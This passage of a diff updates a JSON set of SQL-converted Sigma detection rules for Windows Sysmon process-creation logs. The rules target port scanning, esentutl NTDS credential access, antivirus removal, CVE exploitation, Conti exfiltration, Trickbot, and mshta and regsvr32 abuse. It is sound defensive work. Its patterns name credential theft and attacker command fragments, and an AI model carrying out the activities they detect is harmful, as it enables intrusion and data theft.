Anhaus, Tony Lambert, oscd.community, omkar72", + "title": "WmiPrvSE Spawned A Process", + "id": "d21374ff-f574-44a7-9998-4a8c8bf33d7d", + "status": "stable", + "description": "Detects WmiPrvSE spawning a process", + "author": "Roberto Rodriguez @Cyb3rWard0g", + "tags": [ + "attack.execution", + "attack.t1047" + ], + "falsepositives": [ + "False positives are expected (e.g. in environments where WinRM is used legitimately)" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\WmiPrvSe.exe' ESCAPE '\\' AND NOT ((LogonId IN ('0x3e7', 'null')) OR ((User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (Image LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\') OR (Image LIKE '%\\\\WerFault.exe' ESCAPE '\\') OR (LogonId = '')))" + ], + "filename": "proc_creation_win_wmiprvse_spawning_process.yml" + }, + { + "title": "PUA - Advanced Port Scanner Execution", + "id": "54773c5f-f1cc-4703-9126-2f797d96a69d", + "status": "experimental", + "description": "Detects the use of Advanced Port Scanner.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.discovery", - "attack.t1482" + "attack.t1046", + "attack.t1135" ], "falsepositives": [ - "Legitimate use of the utilities by legitimate user for legitimate reason" + "Legitimate administrative use", + "Tools with similar commandline (very rare)" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\dsquery.exe' ESCAPE '\\' OR OriginalFileName = 'dsquery.exe') AND CommandLine LIKE '%trustedDomain%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\advanced\\_port\\_scanner%' ESCAPE '\\' OR OriginalFileName LIKE '%advanced\\_port\\_scanner%' ESCAPE '\\' OR Description LIKE '%Advanced Port Scanner%' ESCAPE '\\') OR 
(CommandLine LIKE '%/portable%' ESCAPE '\\' AND CommandLine LIKE '%/lng%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_dsquery_domain_trust_discovery.yml" + "filename": "proc_creation_win_pua_advanced_port_scanner.yml" }, { - "title": "Potential Privilege Escalation via Service Permissions Weakness", - "id": "0f9c21f1-6a73-4b0e-9809-cb562cb8d981", + "title": "Esentutl Gather Credentials", + "id": "7df1713a-1a5b-4a4b-a071-dc83b144a101", "status": "test", - "description": "Detect modification of services configuration (ImagePath, FailureCommand and ServiceDLL) in registry by processes with Medium integrity level", - "author": "Teymur Kheirkhabarov", + "description": "Conti recommendation to its affiliates to use esentutl to access NTDS dumped file. Trickbot also uses this utilities to get MSEdge info via its module pwgrab.", + "author": "sam0x90", "tags": [ - "attack.privilege_escalation", - "attack.t1574.011" + "attack.credential_access", + "attack.t1003", + "attack.t1003.003" ], "falsepositives": [ - "Unknown" + "To be determined" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%esentutl%' ESCAPE '\\' AND CommandLine LIKE '% /p%' ESCAPE '\\')" + ], + "filename": "proc_creation_win_esentutl_params.yml" + }, + { + "title": "PUA - CleanWipe Execution", + "id": "f44800ac-38ec-471f-936e-3fa7d9c53100", + "status": "experimental", + "description": "Detects the use of CleanWipe a tool usually used to delete Symantec antivirus.", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "falsepositives": [ + "Legitimate administrative use (Should be investigated either way)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND IntegrityLevel = 'Medium' AND CommandLine LIKE '%ControlSet%' ESCAPE '\\' AND CommandLine LIKE 
'%services%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\ImagePath%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FailureCommand%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ServiceDll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SepRemovalToolNative\\_x64.exe' ESCAPE '\\' OR (Image LIKE '%\\\\CATClean.exe' ESCAPE '\\' AND CommandLine LIKE '%--uninstall%' ESCAPE '\\') OR (Image LIKE '%\\\\NetInstaller.exe' ESCAPE '\\' AND CommandLine LIKE '%-r%' ESCAPE '\\') OR (Image LIKE '%\\\\WFPUnins.exe' ESCAPE '\\' AND CommandLine LIKE '%/uninstall%' ESCAPE '\\' AND CommandLine LIKE '%/enterprise%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_registry_privilege_escalation_via_service_key.yml" + "filename": "proc_creation_win_pua_cleanwipe.yml" }, { - "title": "PsExec Service Execution", - "id": "fdfcbd78-48f1-4a4b-90ac-d82241e368c5", + "title": "Potential CVE-2023-21554 QueueJumper Exploitation", + "id": "53207cc2-0745-4c19-bc72-80be1cc16b3f", "status": "experimental", - "description": "Detects launch of the PSEXESVC service, which means that this system was the target of a psexec remote execution", - "author": "Thomas Patzke, Romaissa Adjailia, Florian Roth (Nextron Systems)", + "description": "Detects potential exploitation of CVE-2023-21554 (dubbed QueueJumper)", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "falsepositives": [ + "Unknown" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\Windows\\\\System32\\\\mqsvc.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE 
'%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsl.exe' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_exploit_cve_2023_21554_queuejumper.yml" + }, + { + "title": "Always Install Elevated MSI Spawned Cmd And Powershell", + "id": "1e53dd56-8d83-4eb4-a43e-b790a05510aa", + "status": "test", + "description": "Detects Windows Installer service (msiexec.exe) spawning \"cmd\" or \"powershell\"", + "author": "Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community", "tags": [ - "attack.execution" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Legitimate administrative tasks" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE 'C:\\\\Windows\\\\PSEXESVC.exe' ESCAPE '\\' OR OriginalFileName = 'psexesvc.exe'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll')) AND (ParentImage LIKE '%\\\\Windows\\\\Installer\\\\%' ESCAPE '\\' AND ParentImage LIKE '%msi%' ESCAPE '\\' AND ParentImage LIKE '%tmp' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sysinternals_psexesvc.yml" + "filename": "proc_creation_win_susp_elavated_msi_spawned_shell.yml" }, { - "title": "Devtoolslauncher.exe Executes Specified Binary", - "id": "cc268ac1-42d9-40fd-9ed3-8c4e1a5b87e6", - "status": "test", - "description": "The Devtoolslauncher.exe executes other binary", - "author": "Beyu Denis, oscd.community (rule), @_felamos (idea)", + "title": "Firewall Rule Deleted Via Netsh.EXE", + "id": "1a5fefe6-734f-452e-a07d-fc1c35bce4b2", + "status": "experimental", + "description": "Detects the removal of a port or application 
rule in the Windows Firewall configuration using netsh", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1562.004" ], "falsepositives": [ - "Legitimate use of devtoolslauncher.exe by legitimate user" + "Legitimate administration activity", + "Software installations and removal" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%delete %' ESCAPE '\\')) AND NOT (ParentImage LIKE '%\\\\Dropbox.exe' ESCAPE '\\' AND CommandLine LIKE '%name=Dropbox%' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_netsh_fw_delete_rule.yml" + }, + { + "title": "Adwind RAT / JRAT", + "id": "1fac1481-2dbc-48b2-9096-753c49b4ec71", + "status": "test", + "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", + "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", + "tags": [ + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\devtoolslauncher.exe' ESCAPE '\\' AND CommandLine LIKE '%LaunchForDeploy%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Oracle%' ESCAPE '\\' AND CommandLine LIKE '%\\\\java%' ESCAPE '\\' AND CommandLine LIKE '%.exe %' ESCAPE '\\') OR (CommandLine LIKE '%cscript.exe%' ESCAPE '\\' AND CommandLine LIKE '%Retrive%' ESCAPE '\\' AND CommandLine LIKE '%.vbs %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_devtoolslauncher.yml" + "filename": "proc_creation_win_malware_adwind.yml" }, { - "title": "Abuse of Service Permissions to Hide Services Via 
Set-Service", - "id": "514e4c3a-c77d-4cde-a00f-046425e2301e", + "title": "Uncommon One Time Only Scheduled Task At 00:00", + "id": "970823b7-273b-460a-8afc-3a6811998529", "status": "experimental", - "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" - ], + "description": "Detects scheduled task creation events that include suspicious actions, and is run once at 00:00", + "author": "pH-T (Nextron Systems)", "falsepositives": [ - "Rare intended use of hidden services" + "Software installation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR OriginalFileName = 'pwsh.dll') AND (CommandLine LIKE '%Set-Service %' ESCAPE '\\' AND CommandLine LIKE '%DCLCWPDTSD%' ESCAPE '\\') AND (CommandLine LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR CommandLine LIKE '%-sd %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe%' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%vbscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%wmic %' ESCAPE '\\' OR CommandLine LIKE '%wmic.exe%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32.exe%' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%once%' ESCAPE '\\' AND CommandLine LIKE '%00:00%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_hide_services_via_set_service.yml" 
+ "filename": "proc_creation_win_schtasks_one_time_only_midnight_task.yml" }, { - "title": "PUA - 3Proxy Execution", - "id": "f38a82d2-fba3-4781-b549-525efbec8506", - "status": "experimental", - "description": "Detects the use of 3proxy, a tiny free proxy server", + "title": "Trickbot Malware Activity", + "id": "58bf96d9-ff5f-44bd-8dcc-1c4f79bf3a27", + "status": "stable", + "description": "Detects Trickbot malware process tree pattern in which \"rundll32.exe\" is a parent of \"wermgr.exe\"", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1572" + "attack.execution", + "attack.t1559" ], "falsepositives": [ - "Administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\3proxy.exe' ESCAPE '\\' OR Description = '3proxy - tiny proxy server' OR CommandLine LIKE '%.exe -i127.0.0.1 -p%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%DllRegisterServer%' ESCAPE '\\')" ], - "filename": "proc_creation_win_pua_3proxy_execution.yml" + "filename": "proc_creation_win_malware_trickbot_wermgr.yml" }, { - "title": "Remote Access Tool - LogMeIn Execution", - "id": "d85873ef-a0f8-4c48-a53a-6b621f11729d", + "title": "Suspicious JavaScript Execution Via Mshta.EXE", + "id": "67f113fa-e23d-4271-befa-30113b3e08b1", "status": "test", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access 
tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "author": "frack113", + "description": "Detects execution of javascript code using \"mshta.exe\".", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.defense_evasion", + "attack.t1218.005" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'LMIGuardianSvc' OR Product = 'LMIGuardianSvc' OR Company = 'LogMeIn, Inc.'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND CommandLine LIKE '%javascript%' ESCAPE '\\')" ], - "filename": "proc_creation_win_remote_access_tools_logmein.yml" + "filename": "proc_creation_win_mshta_javascript.yml" }, { - "title": "UAC Bypass Using Event Viewer RecentViews", - "id": "30fc8de7-d833-40c4-96b6-28319fbc4f6c", + "title": "HackTool - RedMimicry Winnti Playbook Execution", + "id": "95022b85-ff2a-49fa-939a-d7b8f56eeb9b", "status": "test", - "description": "Detects the pattern of UAC Bypass using Event Viewer RecentViews", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects actions caused by the RedMimicry Winnti playbook a automated breach emulations utility", + "author": "Alexander Rausch", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.privilege_escalation" + "attack.t1106", + "attack.t1059.003", + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE 
'%\\\\Event Viewer\\\\RecentViews%' ESCAPE '\\' OR CommandLine LIKE '%\\\\EventV~1\\\\RecentViews%' ESCAPE '\\') AND CommandLine LIKE '%>%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%gthread-3.6.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\tmp.bat%' ESCAPE '\\' OR CommandLine LIKE '%sigcmm-2.4.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_eventvwr_recentviews.yml" + "filename": "proc_creation_win_hktl_redmimicry_winnti_playbook.yml" }, { - "title": "Winnti Malware HK University Campaign", - "id": "3121461b-5aa0-4a41-b910-66d25524edbb", + "title": "Conti NTDS Exfiltration Command", + "id": "aa92fd02-09f2-48b0-8a93-864813fb8f41", "status": "test", - "description": "Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Honk Kong universities", - "author": "Florian Roth (Nextron Systems), Markus Neis", + "description": "Detects a command used by conti to exfiltrate NTDS", + "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002", - "attack.g0044" + "attack.collection", + "attack.t1560" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR ParentImage LIKE '%\\\\hpqhvind.exe%' ESCAPE '\\') AND Image LIKE 'C:\\\\ProgramData\\\\DRM%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\ProgramData\\\\DRM%' ESCAPE '\\' AND Image LIKE '%\\\\wmplayer.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\Test.exe' ESCAPE '\\' AND Image LIKE '%\\\\wmplayer.exe' ESCAPE '\\') OR Image LIKE 'C:\\\\ProgramData\\\\DRM\\\\CLR\\\\CLR.exe' ESCAPE 
'\\' OR (ParentImage LIKE 'C:\\\\ProgramData\\\\DRM\\\\Windows%' ESCAPE '\\' AND Image LIKE '%\\\\SearchFilterHost.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%7za.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\C$\\\\temp\\\\log.zip%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_winnti_mal_hk_jan20.yml" + "filename": "proc_creation_win_malware_conti_7zip.yml" }, { - "title": "Rundll32 InstallScreenSaver Execution", - "id": "15bd98ea-55f4-4d37-b09a-e7caa0fa2221", - "status": "experimental", - "description": "An attacker may execute an application as a SCR File using rundll32.exe desk.cpl,InstallScreenSaver", - "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io, TactiKoolSec", + "title": "Tor Client/Browser Execution", + "id": "62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c", + "status": "test", + "description": "Detects the use of Tor or Tor-Browser to connect to onion routing networks", + "author": "frack113", "tags": [ - "attack.t1218.011", - "attack.defense_evasion" + "attack.command_and_control", + "attack.t1090.003" ], "falsepositives": [ - "Legitimate installation of a new screensaver" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine LIKE '%InstallScreenSaver%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\tor.exe' ESCAPE '\\' OR Image LIKE '%\\\\Tor Browser\\\\Browser\\\\firefox.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_rundll32_installscreensaver.yml" + "filename": "proc_creation_win_browsers_tor_execution.yml" }, { - "title": "Compress Data and Lock With Password for Exfiltration With WINZIP", - "id": 
"e2e80da2-8c66-4e00-ae3c-2eebd29f6b6d", + "title": "Possible Shim Database Persistence via sdbinst.exe", + "id": "517490a7-115a-48c6-8862-1a481504d5a8", "status": "test", - "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities", - "author": "frack113", + "description": "Detects installation of a new shim using sdbinst.exe. A shim can be used to load malicious DLLs into applications.", + "author": "Markus Neis", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.011" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%winzip.exe%' ESCAPE '\\' OR CommandLine LIKE '%winzip64.exe%' ESCAPE '\\') AND CommandLine LIKE '%-s\"%' ESCAPE '\\' AND (CommandLine LIKE '% -min %' ESCAPE '\\' OR CommandLine LIKE '% -a %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sdbinst.exe' ESCAPE '\\' AND CommandLine LIKE '%.sdb%' ESCAPE '\\') AND NOT (CommandLine LIKE '%iisexpressshim.sdb%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_winzip_password_compression.yml" + "filename": "proc_creation_win_sdbinst_shim_persistence.yml" }, { - "title": "Remote Access Tool - Anydesk Execution From Suspicious Folder", - "id": "065b00ca-5d5c-4557-ac95-64a6d0b64d86", + "title": "Suspicious Mshta.EXE Execution Patterns", + "id": "e32f92d1-523e-49c3-9374-bdb13b46a3ba", "status": "experimental", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be 
allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious mshta process execution patterns", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.execution", + "attack.t1106" ], "falsepositives": [ - "Legitimate use of AnyDesk from a non-standard folder" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\AnyDesk.exe' ESCAPE '\\' OR Description = 'AnyDesk' OR Product = 'AnyDesk' OR Company = 'AnyDesk Software GmbH') AND NOT ((Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%Program Files (x86)\\\\AnyDesk%' ESCAPE '\\' OR Image LIKE '%Program Files\\\\AnyDesk%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND ((ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))) OR ((Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND NOT ((Image LIKE 
'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%.htm%' ESCAPE '\\' OR CommandLine LIKE '%.hta%' ESCAPE '\\') OR (CommandLine LIKE '%mshta.exe' ESCAPE '\\' OR CommandLine LIKE '%mshta' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_remote_access_tools_anydesk_susp_exec.yml" + "filename": "proc_creation_win_mshta_susp_pattern.yml" }, { - "title": "Suspicious RDP Redirect Using TSCON", - "id": "f72aa3e8-49f9-4c7d-bd74-f8ab84ff9bbb", + "title": "Regsvr32 Anomaly", + "id": "8e2b24c9-4add-46a0-b4bb-0057b4e6187d", + "status": "experimental", + "description": "Detects various anomalies in relation to regsvr32.exe", + "author": "Florian Roth (Nextron Systems), oscd.community, Tim Shelton", + "tags": [ + "attack.defense_evasion", + "attack.t1218.010", + "car.2019-04-002", + "car.2019-04-003" + ], + "falsepositives": [ + "Unknown" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%/i:%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%scrobj.dll' ESCAPE '\\') OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%/i:%' ESCAPE '\\' AND CommandLine LIKE '%ftp%' ESCAPE '\\' AND CommandLine LIKE '%scrobj.dll' ESCAPE '\\') OR ((Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') AND ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR (Image LIKE '%\\\\EXCEL.EXE' 
ESCAPE '\\' AND CommandLine LIKE '%..\\\\..\\\\..\\\\Windows\\\\System32\\\\regsvr32.exe %' ESCAPE '\\') OR (ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' AND Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\')) OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '%.jpg' ESCAPE '\\' OR CommandLine LIKE '%.jpeg' ESCAPE '\\' OR CommandLine LIKE '%.png' ESCAPE '\\' OR CommandLine LIKE '%.gif' ESCAPE '\\' OR CommandLine LIKE '%.bin' ESCAPE '\\' OR CommandLine LIKE '%.tmp' ESCAPE '\\' OR CommandLine LIKE '%.temp' ESCAPE '\\' OR CommandLine LIKE '%.txt' ESCAPE '\\'))) AND NOT (((CommandLine LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\WebEx\\\\WebEx64\\\\Meetings\\\\atucfobj.dll%' ESCAPE '\\')) OR (ParentImage LIKE 'C:\\\\Program Files\\\\Box\\\\Box\\\\FS\\\\streem.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\Program Files\\\\Box\\\\Box\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/s C:\\\\Windows\\\\System32\\\\RpcProxy\\\\RpcProxy.dll' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_regsvr32_anomalies.yml" + }, + { + "title": "Potential CVE-2021-41379 Exploitation Attempt", + "id": "af8bbce4-f751-46b4-8d91-82a33a736f61", "status": "test", - "description": "Detects a suspicious RDP session redirect using tscon.exe", + "description": "Detects potential exploitation attempts of CVE-2021-41379 (InstallerFileTakeOver), a local privilege escalation (LPE) vulnerability where the attacker spawns a \"cmd.exe\" process as a child of Microsoft Edge elevation service \"elevation_service\" with \"LOCAL_SYSTEM\" rights", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1563.002", - "attack.t1021.001", - "car.2013-07-002" + "attack.privilege_escalation", + "attack.t1068" ], "falsepositives": [ 
